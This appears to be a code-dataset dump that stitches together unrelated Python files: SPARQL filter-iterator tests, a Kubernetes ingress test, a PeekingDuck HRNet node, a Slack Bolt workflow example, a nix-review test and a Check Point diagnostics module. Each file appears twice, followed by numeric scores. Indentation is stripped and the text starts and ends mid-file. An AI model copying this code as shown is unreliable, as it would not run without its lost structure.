'object': '?o',
'graph': 'watdiv100'
}
def test_simple_filter_iterator():
expression = "?p = <http://schema.org/eligibleRegion>"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
def test_and_or_filter_iterator():
expression = "?p = <http://schema.org/eligibleRegion> && (?o = <http://db.uwaterloo.ca/~galuc/wsdbm/Country0> || ?o = <http://db.uwaterloo.ca/~galuc/wsdbm/Country9>)"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 2
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
def test_operation_filter_iterator():
expression = "10 = 5 * 2"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 9
def test_function_filter_iterator():
expression = '?p = <http://purl.org/goodrelations/price> && isLiteral(?o) && !isNumeric(?o)'
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 1
def test_filter_iterator_interrupt():
expression = "?p = <http://schema.org/eligibleRegion>"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, 10e-7)
assert len(results) <= 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
tmp = len(results)
reloaded = load(saved.SerializeToString(), DummyDataset(hdtDoc, 'watdiv100'))
(results, saved, done) = engine.execute(reloaded, 10e7)
assert len(results) + tmp == 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
assert done | tests/iterators/filter_iterator_test.py | from query_engine.sage_engine import SageEngine
from query_engine.iterators.scan import ScanIterator
from query_engine.iterators.filter import FilterIterator
from query_engine.iterators.projection import ProjectionIterator
from query_engine.iterators.loader import load
from database.hdt_file_connector import HDTFileConnector
from tests.utils import DummyDataset
import math
hdtDoc = HDTFileConnector('tests/data/watdiv.10M.hdt')
engine = SageEngine()
triple = {
'subject': 'http://db.uwaterloo.ca/~galuc/wsdbm/Offer1000',
'predicate': '?p',
'object': '?o',
'graph': 'watdiv100'
}
def test_simple_filter_iterator():
expression = "?p = <http://schema.org/eligibleRegion>"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
def test_and_or_filter_iterator():
expression = "?p = <http://schema.org/eligibleRegion> && (?o = <http://db.uwaterloo.ca/~galuc/wsdbm/Country0> || ?o = <http://db.uwaterloo.ca/~galuc/wsdbm/Country9>)"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 2
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
def test_operation_filter_iterator():
expression = "10 = 5 * 2"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 9
def test_function_filter_iterator():
expression = '?p = <http://purl.org/goodrelations/price> && isLiteral(?o) && !isNumeric(?o)'
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 1
def test_filter_iterator_interrupt():
expression = "?p = <http://schema.org/eligibleRegion>"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, 10e-7)
assert len(results) <= 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
tmp = len(results)
reloaded = load(saved.SerializeToString(), DummyDataset(hdtDoc, 'watdiv100'))
(results, saved, done) = engine.execute(reloaded, 10e7)
assert len(results) + tmp == 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
assert done | 0.654784 | 0.344554 |
import requests
import pytest
from suite.resources_utils import ensure_connection_to_public_endpoint, create_items_from_yaml, create_example_app, \
wait_until_all_pods_are_ready, ensure_response_from_backend, create_namespace_with_name_from_yaml, delete_namespace
from suite.yaml_utils import get_first_ingress_host_from_yaml
from settings import TEST_DATA
class BackendSetup:
"""
Encapsulate the example details.
Attributes:
req_url (str):
ingress_hosts (dict):
"""
def __init__(self, req_url, ingress_hosts):
self.req_url = req_url
self.ingress_hosts = ingress_hosts
@pytest.fixture(scope="class")
def backend_setup(request, kube_apis, ingress_controller_endpoint) -> BackendSetup:
"""
Create 2 namespaces and deploy simple applications in them.
:param request: pytest fixture
:param kube_apis: client apis
:param ingress_controller_endpoint: public endpoint
:return: BackendSetup
"""
watched_namespace = create_namespace_with_name_from_yaml(kube_apis.v1,
f"watched-ns", f"{TEST_DATA}/common/ns.yaml")
foreign_namespace = create_namespace_with_name_from_yaml(kube_apis.v1,
f"foreign-ns", f"{TEST_DATA}/common/ns.yaml")
ingress_hosts = {}
for ns in [watched_namespace, foreign_namespace]:
print(f"------------------------- Deploy the backend in {ns} -----------------------------------")
create_example_app(kube_apis, "simple", ns)
src_ing_yaml = f"{TEST_DATA}/watch-namespace/{ns}-ingress.yaml"
create_items_from_yaml(kube_apis, src_ing_yaml, ns)
ingress_host = get_first_ingress_host_from_yaml(src_ing_yaml)
ingress_hosts[f"{ns}-ingress"] = ingress_host
req_url = f"http://{ingress_controller_endpoint.public_ip}:{ingress_controller_endpoint.port}/backend1"
wait_until_all_pods_are_ready(kube_apis.v1, ns)
ensure_connection_to_public_endpoint(ingress_controller_endpoint.public_ip,
ingress_controller_endpoint.port,
ingress_controller_endpoint.port_ssl)
def fin():
print("Clean up:")
delete_namespace(kube_apis.v1, watched_namespace)
delete_namespace(kube_apis.v1, foreign_namespace)
request.addfinalizer(fin)
return BackendSetup(req_url, ingress_hosts)
@pytest.mark.ingresses
@pytest.mark.parametrize('ingress_controller, expected_responses',
[
pytest.param({"extra_args": ["-watch-namespace=watched-ns"]},
{"watched-ns-ingress": 200, "foreign-ns-ingress": 404})
],
indirect=["ingress_controller"])
class TestWatchNamespace:
def test_response_codes(self, ingress_controller, backend_setup, expected_responses):
for ing in ["watched-ns-ingress", "foreign-ns-ingress"]:
ensure_response_from_backend(backend_setup.req_url, backend_setup.ingress_hosts[ing])
resp = requests.get(backend_setup.req_url, headers={"host": backend_setup.ingress_hosts[ing]})
assert resp.status_code == expected_responses[ing],\
f"Expected: {expected_responses[ing]} response code for {backend_setup.ingress_hosts[ing]}" | tests/suite/test_watch_namespace.py | import requests
import pytest
from suite.resources_utils import ensure_connection_to_public_endpoint, create_items_from_yaml, create_example_app, \
wait_until_all_pods_are_ready, ensure_response_from_backend, create_namespace_with_name_from_yaml, delete_namespace
from suite.yaml_utils import get_first_ingress_host_from_yaml
from settings import TEST_DATA
class BackendSetup:
"""
Encapsulate the example details.
Attributes:
req_url (str):
ingress_hosts (dict):
"""
def __init__(self, req_url, ingress_hosts):
self.req_url = req_url
self.ingress_hosts = ingress_hosts
@pytest.fixture(scope="class")
def backend_setup(request, kube_apis, ingress_controller_endpoint) -> BackendSetup:
"""
Create 2 namespaces and deploy simple applications in them.
:param request: pytest fixture
:param kube_apis: client apis
:param ingress_controller_endpoint: public endpoint
:return: BackendSetup
"""
watched_namespace = create_namespace_with_name_from_yaml(kube_apis.v1,
f"watched-ns", f"{TEST_DATA}/common/ns.yaml")
foreign_namespace = create_namespace_with_name_from_yaml(kube_apis.v1,
f"foreign-ns", f"{TEST_DATA}/common/ns.yaml")
ingress_hosts = {}
for ns in [watched_namespace, foreign_namespace]:
print(f"------------------------- Deploy the backend in {ns} -----------------------------------")
create_example_app(kube_apis, "simple", ns)
src_ing_yaml = f"{TEST_DATA}/watch-namespace/{ns}-ingress.yaml"
create_items_from_yaml(kube_apis, src_ing_yaml, ns)
ingress_host = get_first_ingress_host_from_yaml(src_ing_yaml)
ingress_hosts[f"{ns}-ingress"] = ingress_host
req_url = f"http://{ingress_controller_endpoint.public_ip}:{ingress_controller_endpoint.port}/backend1"
wait_until_all_pods_are_ready(kube_apis.v1, ns)
ensure_connection_to_public_endpoint(ingress_controller_endpoint.public_ip,
ingress_controller_endpoint.port,
ingress_controller_endpoint.port_ssl)
def fin():
print("Clean up:")
delete_namespace(kube_apis.v1, watched_namespace)
delete_namespace(kube_apis.v1, foreign_namespace)
request.addfinalizer(fin)
return BackendSetup(req_url, ingress_hosts)
@pytest.mark.ingresses
@pytest.mark.parametrize('ingress_controller, expected_responses',
[
pytest.param({"extra_args": ["-watch-namespace=watched-ns"]},
{"watched-ns-ingress": 200, "foreign-ns-ingress": 404})
],
indirect=["ingress_controller"])
class TestWatchNamespace:
def test_response_codes(self, ingress_controller, backend_setup, expected_responses):
for ing in ["watched-ns-ingress", "foreign-ns-ingress"]:
ensure_response_from_backend(backend_setup.req_url, backend_setup.ingress_hosts[ing])
resp = requests.get(backend_setup.req_url, headers={"host": backend_setup.ingress_hosts[ing]})
assert resp.status_code == expected_responses[ing],\
f"Expected: {expected_responses[ing]} response code for {backend_setup.ingress_hosts[ing]}" | 0.591841 | 0.341775 |
from typing import Any, Dict
from peekingduck.pipeline.nodes.abstract_node import AbstractNode
from peekingduck.pipeline.nodes.model.hrnetv1 import hrnet_model
class Node(AbstractNode):
"""Initializes and uses HRNet model to infer poses from detected bboxes.
Note that HRNet must be used in conjunction with an object detector applied
prior.
The HRNet applied to human pose estimation uses the representation head,
called HRNetV1.
The HRNet node is capable of detecting single human figures simultaneously
per inference, with 17 keypoints estimated for each detected human figure.
The keypoint indices table can be found
:ref:`here <whole-body-keypoint-ids>`.
Inputs:
|img_data|
|bboxes_data|
Outputs:
|keypoints_data|
|keypoint_scores_data|
|keypoint_conns_data|
Configs:
weights_parent_dir (:obj:`Optional[str]`): **default = null**. |br|
Change the parent directory where weights will be stored by
replacing ``null`` with an absolute path to the desired directory.
resolution (:obj:`Dict`):
**default = { height: 192, width: 256 }**. |br|
Resolution of input array to HRNet model.
score_threshold (:obj:`float`): **[0, 1], default = 0.1**. |br|
Threshold to determine if detection should be returned
References:
Deep High-Resolution Representation Learning for Visual Recognition:
https://arxiv.org/abs/1908.07919
"""
def __init__(self, config: Dict[str, Any] = None, **kwargs: Any) -> None:
super().__init__(config, node_path=__name__, **kwargs)
self.model = hrnet_model.HRNetModel(self.config)
def run(self, inputs: Dict[str, Any]) -> Dict[str, Any]:
"""Reads the bbox input and returns the poses and pose bbox of the
specified objects chosen to be detected.
"""
keypoints, keypoint_scores, keypoint_conns = self.model.predict(
inputs["img"], inputs["bboxes"]
)
outputs = {
"keypoints": keypoints,
"keypoint_scores": keypoint_scores,
"keypoint_conns": keypoint_conns,
}
return outputs | peekingduck/pipeline/nodes/model/hrnet.py | from typing import Any, Dict
from peekingduck.pipeline.nodes.abstract_node import AbstractNode
from peekingduck.pipeline.nodes.model.hrnetv1 import hrnet_model
class Node(AbstractNode):
"""Initializes and uses HRNet model to infer poses from detected bboxes.
Note that HRNet must be used in conjunction with an object detector applied
prior.
The HRNet applied to human pose estimation uses the representation head,
called HRNetV1.
The HRNet node is capable of detecting single human figures simultaneously
per inference, with 17 keypoints estimated for each detected human figure.
The keypoint indices table can be found
:ref:`here <whole-body-keypoint-ids>`.
Inputs:
|img_data|
|bboxes_data|
Outputs:
|keypoints_data|
|keypoint_scores_data|
|keypoint_conns_data|
Configs:
weights_parent_dir (:obj:`Optional[str]`): **default = null**. |br|
Change the parent directory where weights will be stored by
replacing ``null`` with an absolute path to the desired directory.
resolution (:obj:`Dict`):
**default = { height: 192, width: 256 }**. |br|
Resolution of input array to HRNet model.
score_threshold (:obj:`float`): **[0, 1], default = 0.1**. |br|
Threshold to determine if detection should be returned
References:
Deep High-Resolution Representation Learning for Visual Recognition:
https://arxiv.org/abs/1908.07919
"""
def __init__(self, config: Dict[str, Any] = None, **kwargs: Any) -> None:
super().__init__(config, node_path=__name__, **kwargs)
self.model = hrnet_model.HRNetModel(self.config)
def run(self, inputs: Dict[str, Any]) -> Dict[str, Any]:
"""Reads the bbox input and returns the poses and pose bbox of the
specified objects chosen to be detected.
"""
keypoints, keypoint_scores, keypoint_conns = self.model.predict(
inputs["img"], inputs["bboxes"]
)
outputs = {
"keypoints": keypoints,
"keypoint_scores": keypoint_scores,
"keypoint_conns": keypoint_conns,
}
return outputs | 0.946026 | 0.535706 |
import sys
sys.path.insert(1, "../..")
# ------------------------------------------------
import logging
from slack_sdk.web.async_client import AsyncSlackResponse, AsyncWebClient
from slack_bolt.async_app import AsyncApp, AsyncAck
logging.basicConfig(level=logging.DEBUG)
# export SLACK_SIGNING_SECRET=***
# export SLACK_BOT_TOKEN=xoxb-***
app = AsyncApp()
# https://api.slack.com/tutorials/workflow-builder-steps
@app.action({"type": "workflow_step_edit", "callback_id": "copy_review"})
async def edit(body: dict, ack: AsyncAck, client: AsyncWebClient):
await ack()
new_modal: AsyncSlackResponse = await client.views_open(
trigger_id=body["trigger_id"],
view={
"type": "workflow_step",
"callback_id": "copy_review_view",
"blocks": [
{
"type": "section",
"block_id": "intro-section",
"text": {
"type": "plain_text",
"text": "Create a task in one of the listed projects. The link to the task and other details will be available as variable data in later steps.",
},
},
{
"type": "input",
"block_id": "task_name_input",
"element": {
"type": "plain_text_input",
"action_id": "task_name",
"placeholder": {
"type": "plain_text",
"text": "Write a task name",
},
},
"label": {"type": "plain_text", "text": "Task name"},
},
{
"type": "input",
"block_id": "task_description_input",
"element": {
"type": "plain_text_input",
"action_id": "task_description",
"placeholder": {
"type": "plain_text",
"text": "Write a description for your task",
},
},
"label": {"type": "plain_text", "text": "Task description"},
},
{
"type": "input",
"block_id": "task_author_input",
"element": {
"type": "plain_text_input",
"action_id": "task_author",
"placeholder": {
"type": "plain_text",
"text": "Write a task name",
},
},
"label": {"type": "plain_text", "text": "Task author"},
},
],
},
)
@app.view("copy_review_view")
async def save(ack: AsyncAck, client: AsyncWebClient, body: dict):
state_values = body["view"]["state"]["values"]
response: AsyncSlackResponse = await client.api_call(
api_method="workflows.updateStep",
json={
"workflow_step_edit_id": body["workflow_step"]["workflow_step_edit_id"],
"inputs": {
"taskName": {
"value": state_values["task_name_input"]["task_name"]["value"],
},
"taskDescription": {
"value": state_values["task_description_input"]["task_description"][
"value"
],
},
"taskAuthorEmail": {
"value": state_values["task_author_input"]["task_author"]["value"],
},
},
"outputs": [
{
"name": "taskName",
"type": "text",
"label": "Task Name",
},
{
"name": "taskDescription",
"type": "text",
"label": "Task Description",
},
{
"name": "taskAuthorEmail",
"type": "text",
"label": "Task Author Email",
},
],
},
)
await ack()
pseudo_database = {}
@app.event("workflow_step_execute")
async def execute(body: dict, client: AsyncWebClient):
step = body["event"]["workflow_step"]
completion: AsyncSlackResponse = await client.api_call(
api_method="workflows.stepCompleted",
json={
"workflow_step_execute_id": step["workflow_step_execute_id"],
"outputs": {
"taskName": step["inputs"]["taskName"]["value"],
"taskDescription": step["inputs"]["taskDescription"]["value"],
"taskAuthorEmail": step["inputs"]["taskAuthorEmail"]["value"],
},
},
)
user: AsyncSlackResponse = await client.users_lookupByEmail(
email=step["inputs"]["taskAuthorEmail"]["value"]
)
user_id = user["user"]["id"]
new_task = {
"task_name": step["inputs"]["taskName"]["value"],
"task_description": step["inputs"]["taskDescription"]["value"],
}
tasks = pseudo_database.get(user_id, [])
tasks.append(new_task)
pseudo_database[user_id] = tasks
blocks = []
for task in tasks:
blocks.append(
{
"type": "section",
"text": {"type": "plain_text", "text": task["task_name"]},
}
)
blocks.append({"type": "divider"})
home_tab_update: AsyncSlackResponse = await client.views_publish(
user_id=user_id,
view={
"type": "home",
"title": {"type": "plain_text", "text": "Your tasks!"},
"blocks": blocks,
},
)
if __name__ == "__main__":
app.start(3000) # POST http://localhost:3000/slack/events | examples/workflow_steps/async_steps_from_apps_primitive.py | import sys
sys.path.insert(1, "../..")
# ------------------------------------------------
import logging
from slack_sdk.web.async_client import AsyncSlackResponse, AsyncWebClient
from slack_bolt.async_app import AsyncApp, AsyncAck
logging.basicConfig(level=logging.DEBUG)
# export SLACK_SIGNING_SECRET=***
# export SLACK_BOT_TOKEN=xoxb-***
app = AsyncApp()
# https://api.slack.com/tutorials/workflow-builder-steps
@app.action({"type": "workflow_step_edit", "callback_id": "copy_review"})
async def edit(body: dict, ack: AsyncAck, client: AsyncWebClient):
await ack()
new_modal: AsyncSlackResponse = await client.views_open(
trigger_id=body["trigger_id"],
view={
"type": "workflow_step",
"callback_id": "copy_review_view",
"blocks": [
{
"type": "section",
"block_id": "intro-section",
"text": {
"type": "plain_text",
"text": "Create a task in one of the listed projects. The link to the task and other details will be available as variable data in later steps.",
},
},
{
"type": "input",
"block_id": "task_name_input",
"element": {
"type": "plain_text_input",
"action_id": "task_name",
"placeholder": {
"type": "plain_text",
"text": "Write a task name",
},
},
"label": {"type": "plain_text", "text": "Task name"},
},
{
"type": "input",
"block_id": "task_description_input",
"element": {
"type": "plain_text_input",
"action_id": "task_description",
"placeholder": {
"type": "plain_text",
"text": "Write a description for your task",
},
},
"label": {"type": "plain_text", "text": "Task description"},
},
{
"type": "input",
"block_id": "task_author_input",
"element": {
"type": "plain_text_input",
"action_id": "task_author",
"placeholder": {
"type": "plain_text",
"text": "Write a task name",
},
},
"label": {"type": "plain_text", "text": "Task author"},
},
],
},
)
@app.view("copy_review_view")
async def save(ack: AsyncAck, client: AsyncWebClient, body: dict):
state_values = body["view"]["state"]["values"]
response: AsyncSlackResponse = await client.api_call(
api_method="workflows.updateStep",
json={
"workflow_step_edit_id": body["workflow_step"]["workflow_step_edit_id"],
"inputs": {
"taskName": {
"value": state_values["task_name_input"]["task_name"]["value"],
},
"taskDescription": {
"value": state_values["task_description_input"]["task_description"][
"value"
],
},
"taskAuthorEmail": {
"value": state_values["task_author_input"]["task_author"]["value"],
},
},
"outputs": [
{
"name": "taskName",
"type": "text",
"label": "Task Name",
},
{
"name": "taskDescription",
"type": "text",
"label": "Task Description",
},
{
"name": "taskAuthorEmail",
"type": "text",
"label": "Task Author Email",
},
],
},
)
await ack()
pseudo_database = {}
@app.event("workflow_step_execute")
async def execute(body: dict, client: AsyncWebClient):
step = body["event"]["workflow_step"]
completion: AsyncSlackResponse = await client.api_call(
api_method="workflows.stepCompleted",
json={
"workflow_step_execute_id": step["workflow_step_execute_id"],
"outputs": {
"taskName": step["inputs"]["taskName"]["value"],
"taskDescription": step["inputs"]["taskDescription"]["value"],
"taskAuthorEmail": step["inputs"]["taskAuthorEmail"]["value"],
},
},
)
user: AsyncSlackResponse = await client.users_lookupByEmail(
email=step["inputs"]["taskAuthorEmail"]["value"]
)
user_id = user["user"]["id"]
new_task = {
"task_name": step["inputs"]["taskName"]["value"],
"task_description": step["inputs"]["taskDescription"]["value"],
}
tasks = pseudo_database.get(user_id, [])
tasks.append(new_task)
pseudo_database[user_id] = tasks
blocks = []
for task in tasks:
blocks.append(
{
"type": "section",
"text": {"type": "plain_text", "text": task["task_name"]},
}
)
blocks.append({"type": "divider"})
home_tab_update: AsyncSlackResponse = await client.views_publish(
user_id=user_id,
view={
"type": "home",
"title": {"type": "plain_text", "text": "Your tasks!"},
"blocks": blocks,
},
)
if __name__ == "__main__":
app.start(3000) # POST http://localhost:3000/slack/events | 0.374791 | 0.284793 |
import unittest
from typing import Any, List, Tuple
from unittest.mock import MagicMock, mock_open, patch
from nix_review.cli import main
from .cli_mocks import (
CliTestCase,
IgnoreArgument,
Mock,
MockCompletedProcess,
build_cmds,
read_asset,
)
def borg_eval_cmds() -> List[Tuple[Any, Any]]:
return [
(IgnoreArgument, mock_open(read_data=read_asset("github-pull-37200.json"))()),
(
IgnoreArgument,
mock_open(read_data=read_asset("github-pull-37200-statuses.json"))(),
),
(
"https://gist.githubusercontent.com/GrahamcOfBorg/4c9ebc3e608308c6096202375b0dc902/raw/",
read_asset("gist-37200.txt").encode("utf-8").split(b"\n"),
),
(
[
"git",
"fetch",
"--force",
"https://github.com/NixOS/nixpkgs",
"master:refs/nix-review/0",
"pull/37200/head:refs/nix-review/1",
],
MockCompletedProcess(),
),
(
["git", "rev-parse", "--verify", "refs/nix-review/0"],
MockCompletedProcess(stdout=b"hash1\n"),
),
(
["git", "rev-parse", "--verify", "refs/nix-review/1"],
MockCompletedProcess(stdout=b"hash2\n"),
),
(["git", "worktree", "add", IgnoreArgument, "hash1"], MockCompletedProcess()),
(["git", "merge", "--no-commit", "hash2"], MockCompletedProcess()),
(
["nix", "eval", "--raw", "nixpkgs.system"],
MockCompletedProcess(stdout=b"x86_64-linux"),
),
]
class PrCommandTestCase(CliTestCase):
@patch("urllib.request.urlopen")
@patch("subprocess.run")
def test_pr_command_borg_eval(
self, mock_run: MagicMock, mock_urlopen: MagicMock
) -> None:
effects = Mock(self, borg_eval_cmds() + build_cmds)
mock_run.side_effect = effects
mock_urlopen.side_effect = effects
main(
"nix-review",
[
"pr",
"--build-args",
'--builders "ssh://joerg@10.243.29.170 aarch64-linux"',
"37200",
],
)
if __name__ == "__main__":
unittest.main(failfast=True) | nix_review/tests/test_pr_borg_eval.py | import unittest
from typing import Any, List, Tuple
from unittest.mock import MagicMock, mock_open, patch
from nix_review.cli import main
from .cli_mocks import (
CliTestCase,
IgnoreArgument,
Mock,
MockCompletedProcess,
build_cmds,
read_asset,
)
def borg_eval_cmds() -> List[Tuple[Any, Any]]:
return [
(IgnoreArgument, mock_open(read_data=read_asset("github-pull-37200.json"))()),
(
IgnoreArgument,
mock_open(read_data=read_asset("github-pull-37200-statuses.json"))(),
),
(
"https://gist.githubusercontent.com/GrahamcOfBorg/4c9ebc3e608308c6096202375b0dc902/raw/",
read_asset("gist-37200.txt").encode("utf-8").split(b"\n"),
),
(
[
"git",
"fetch",
"--force",
"https://github.com/NixOS/nixpkgs",
"master:refs/nix-review/0",
"pull/37200/head:refs/nix-review/1",
],
MockCompletedProcess(),
),
(
["git", "rev-parse", "--verify", "refs/nix-review/0"],
MockCompletedProcess(stdout=b"hash1\n"),
),
(
["git", "rev-parse", "--verify", "refs/nix-review/1"],
MockCompletedProcess(stdout=b"hash2\n"),
),
(["git", "worktree", "add", IgnoreArgument, "hash1"], MockCompletedProcess()),
(["git", "merge", "--no-commit", "hash2"], MockCompletedProcess()),
(
["nix", "eval", "--raw", "nixpkgs.system"],
MockCompletedProcess(stdout=b"x86_64-linux"),
),
]
class PrCommandTestCase(CliTestCase):
@patch("urllib.request.urlopen")
@patch("subprocess.run")
def test_pr_command_borg_eval(
self, mock_run: MagicMock, mock_urlopen: MagicMock
) -> None:
effects = Mock(self, borg_eval_cmds() + build_cmds)
mock_run.side_effect = effects
mock_urlopen.side_effect = effects
main(
"nix-review",
[
"pr",
"--build-args",
'--builders "ssh://joerg@10.243.29.170 aarch64-linux"',
"37200",
],
)
if __name__ == "__main__":
unittest.main(failfast=True) | 0.672117 | 0.286543 |
from templates import diag
import os, time
import func
class diag_troubleshooting_f2f_worker(diag):
page = "Troubleshooting.F2F Worker"
title = "Debug F2F Worker Connections"
isFirewall = True
isManagement = False
isClusterXL = False
minVersion = 8020
content = ['This command enables:', 'echo 1 > /proc/cpkstats/fw_worker_[workerid]_stats', '', 'and prints the results:', 'cat /proc/cpkstats/fw_worker_[workerid]_stats', '', 'last but no least, it will disable debug:', 'echo 0 > /proc/cpkstats/fw_worker_[workerid]_stats']
isTable = False
workers = []
def change_f2f_stats(self, worker_id, val):
self.debug(3, "echo " + str(val) + " > /proc/cpkstats/fw_worker_" + str(worker_id) + "_stats")
os.system("echo " + str(val) + " > /proc/cpkstats/fw_worker_" + str(worker_id) + "_stats")
def getall_f2f_worker(self):
workers = []
for filename in os.listdir("/proc/cpkstats/"):
if "fw_worker_" in filename and "_stats" in filename and not "raw" in filename:
workers.append(int(filename.replace("fw_worker_","").replace("_stats","")))
return workers
def enable_disable(self, action = 0):
self.workers = self.getall_f2f_worker()
for worker in self.workers:
self.change_f2f_stats(worker, action)
def set_enable(self):
self.isTable = True
self.enable_disable(1)
def set_disable(self):
self.enable_disable(0)
def run_loop(self):
self.content = []
stats = []
stats_sort = []
self.content.append([ "Worker", "Type", "Cycles", "Time ago", "Proto", "Source", "SPORT", "Destination", "DPORT" ])
for worker in self.workers:
for line in func.tail_and_head('/proc/cpkstats/fw_worker_' + str(worker) + '_stats', 18, 16):
raw = str(line).replace('\t','').replace('\n','')
raw = raw.split()
s_worker = worker
s_type = raw[0].replace(':','')
s_cycles = int(raw[1])
s_timeago = int(raw[2])
raw = raw[3:]
s_data = ' '.join(raw)
new = { 'worker': s_worker, 'type': s_type, 'cycles': s_cycles, 'timeago': s_timeago, 'data': s_data }
stats.append(new)
stats_sort = sorted(stats, key=lambda k: k['cycles'], reverse=True)
for s in stats_sort:
if "," in s["data"]:
data = s["data"].replace("<","").replace(">","").split(",")
if len(data) > 4:
proto = str(data[5]).strip()
if proto == "1":
proto = "ICMP"
if proto == "6":
proto = "TCP"
if proto == "17":
proto = "UDP"
src = data[1].strip()
src_p = data[2].strip()
dst = data[3].strip()
dst_p = data[4].strip()
self.content.append([ str(s["worker"]), str(s["type"]), str(s["cycles"]), str(s["timeago"]), proto, src, src_p, dst, dst_p ])
class diag_troubleshooting_clusterxl_state(diag):
page = "Troubleshooting.ClusterXL State"
title = "Show ClusterXL State"
isFirewall = True
isManagement = False
isClusterXL = True
minVersion = 8020
content = [ 'Starting Output...' ]
isDebugCommand = False
isTable = False
def run_loop(self):
out, err = func.execute_command('cphaprob state ; echo ; cphaprob -a if')
self.content = out.read().split('\n')
class diag_troubleshooting_throughput(diag):
page = "Troubleshooting.Throughput"
title = "Show troughput"
isFirewall = True
isManagement = True
minVersion = 8020
content = ["Please wait, while starting Output..."]
isDebugCommand = False
isTable = False
last_rx_bytes = {}
last_tx_bytes = {}
rx_bytes = {}
tx_bytes = {}
rx_sum = {}
tx_sum = {}
ipaddr = {}
nics = []
def run_loop(self):
showme = True
# grab all active nics
if len(self.nics) < 1:
out, err = func.execute_command('ifconfig | grep HWaddr')
for data in out.read().split('\n'):
if "Ethernet" in data:
raw = data.split()
nic = raw[0].strip()
self.nics.append(nic)
# grab ip address from interface
if len(self.ipaddr) < 1:
for nic in self.nics:
if nic not in self.ipaddr:
ipa = "0.0.0.0"
out, err = func.execute_command('ifconfig ' + nic + ' | grep "inet addr"')
data = out.read()
if data != "":
data = data.split(':')[1]
ipa = data.split(' ')[0]
self.ipaddr[nic] = ipa
# grab rx and tx bytes
for nic in self.nics:
out, err = func.execute_command('cat /sys/class/net/' + nic + '/statistics/rx_bytes')
data = out.read()
if nic not in self.last_rx_bytes:
showme = False
else:
self.rx_bytes[nic] = int(data.strip()) - int(self.last_rx_bytes[nic])
